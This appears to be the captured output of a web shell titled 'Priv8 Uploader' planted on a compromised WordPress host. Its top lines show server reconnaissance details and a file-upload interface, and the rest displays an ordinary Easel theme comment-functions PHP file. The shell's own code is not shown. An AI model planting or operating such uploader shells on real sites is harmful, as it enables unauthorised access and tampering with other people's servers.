GIF89a;
Notice: Undefined index: in /home/bs3263/domains/poolq.ee/public_html/wp-content/plugins/classic-editor/classic-editor.php on line 3

Priv8 Uploader By InMyMine7

Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
HEX
HEX
Server: Apache/2
System: Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
User: bs3263 (524)
PHP: 7.3.5
Disabled: NONE
Upload Files
File: /home/bs3263/domains/poolq.ee/old_old/wp-content/themes/easel/functions/comment-functions.php
<?php

/**
* Better display of avatars in comments
* Should only be used in comment sections (may update in future)
* Checks for false empty commenter URLs 'http://' w/registered users
* Adds the class 'photo' to the image
* Adds a call to 'images/trackback.jpg' for trackbacks
* Adds a call to 'images/pingback.jpg' for pingbacks
*
* Filters should only return a string for an image URL for the avatar with class $avatar
* They should not get the avatar as this is done after the filter
*
* @since 0.2
* @filter
*/
function easel_avatar() {
	global $comment;

	$url = get_comment_author_url();

	$comment_type = get_comment_type();

	if ($comment_type != 'pingback' && $comment_type != 'trackback') {
		
		echo '<div class="comment-avatar">';
		if($url == true && $url != 'http://')
			echo '<a href="' . $url . '" rel="external nofollow" title="' . esc_html(get_comment_author(), 1) . '">';
		$id_or_email = get_comment_author_email();
		if (empty($id_or_email)) $id_or_email = get_comment_author();
			$return_str = str_replace('photo', 'photo instant nocorner itxtalt', get_avatar($id_or_email, 64, easel_random_default_avatar($id_or_email), esc_html(get_comment_author(), 1)));
			echo $return_str;
		if($url == true && $url != 'http://')
			echo '</a>';
		echo '</div>';
	}
	
}

/**
* Properly displays comment author name/link
* bbPress and other external systems sometimes don't set a display name for registrations
* WP has problems if no display name is set
* WP gives registered users URL of 'http://' if none is set
*
* @since 0.2.2
*/
function easel_comment_author() {
	global $comment;

	$author = get_comment_author();
	$url = get_comment_author_url();

	/*
	* Registered members w/o URL defaults to 'http://'
	*/
	if($url == 'http://')
		$url = false;

	/*
	* Registered through bbPress sometimes leaves no display name
	* Bug with bbPress 0.9 series and WP 2.5 (no later testing)
	* 'Anonymous' should be localized according to WP, not the theme
	*/
	if($comment->user_id > 0) :
		$user = get_userdata($comment->user_id);
		if($user->display_name)
			$author = $user->display_name;
		elseif($user->user_nickname)
			$author = $user->nickname;
		elseif($user->user_nicename)
			$author = $user->user_nicename;
		else
			$author = $user->user_login;
	endif;

	/*
	* Display link and cite if URL is set
	* Also properly cites trackbacks/pingbacks
	*/
	if($url) :
		$output = '<cite title="' . $url . '">';
		$output .= '<a href="' . $url . '" title="' . esc_html($author, 1) . '" class="external nofollow">' . $author . '</a>';
		$output .= '</cite>';
	else :
		$output = '<cite>';
		$output .= $author;
		$output .= '</cite>';
	endif;

	echo $output;
}

/**
* Displays individual comments
* Uses the callback parameter for wp_list_comments
* Overwrites the default display of comments
*
* @since 0.2.3
*
* @param $comment The comment variable
* @param $args Array of arguments passed from wp_list_comments
* @param $depth What level the particular comment is
*/
function easel_comments_callback($comment, $args, $depth) {
	$GLOBALS['comment'] = $comment;
	$GLOBALS['comment_depth'] = $depth;
	?>
	<li id="comment-<?php comment_ID(); ?>" <?php comment_class(); ?>>
	
		<?php easel_avatar(); // Avatar filter ?>
		
		<div class="comment-content">
		
			<div class="comment-author vcard">
				<?php easel_comment_author(); ?>
			</div>
	
			<div class="comment-meta-data">
						
				<span class="comment-time" title="<?php comment_date(__('l, F jS, Y, g:i a','easel')); ?>">
					<?php printf(__('%1$s at %2$s','easel'), get_comment_date(), get_comment_time()); ?>
				</span> 
		
				<span class="comment-permalink">
					<span class="separator">|</span> <a href="#comment-<?php echo str_replace('&', '&amp;', get_comment_ID()); ?>" title="<?php _e('Permalink to comment','easel'); ?>"><?php _e('#','easel'); ?></a>
				</span>
				
				<?php if((get_option('thread_comments')) && ($args['type'] == 'all' || get_comment_type() == 'comment')) :
					$max_depth = get_option('thread_comments_depth');
					echo comment_reply_link(array(
						'reply_text' => __('Reply','easel'), 
						'login_text' => __('Login to Reply','easel'),
						'depth' => $depth,
						'max_depth' => $max_depth, 
						'before' => '<span class="comment-reply-link"><span class="separator">|</span> ', 
						'after' => '</span>'
					));
				endif; ?>
					
				<?php edit_comment_link('<span class="edit">'.__('Edit','easel').'</span>',' <span class="separator">|</span> ',''); ?> 
				
				<?php if($comment->comment_approved == '0') : ?>
				<div class="comment-moderated"><?php _e('Your comment is awaiting moderation.','easel'); ?></div>
				<?php endif; ?>
			
			</div>

			<?php if (get_comment_type() == 'comment') { ?>
				<div class="comment-text">
					<?php comment_text(); ?>
				</div>
			<?php } ?>
						
		</div>
		
		<div class="clear"></div>
		
<?php }

/**
* Ends the display of individual comments
* Uses the callback parameter for wp_list_comments
* Needs to be used in conjunction with easel_comments_callback
* Not needed but used just in case something is changed
*
* @since 0.2.3
*/
function easel_comments_end_callback() {
	echo '</li>';
}

function list_pings($comment, $args, $depth) {       
	$GLOBALS['comment'] = $comment; ?>
		<li id="comment-<?php comment_ID(); ?>">
		<?php easel_comment_author(); ?></li>
<?php } 

?>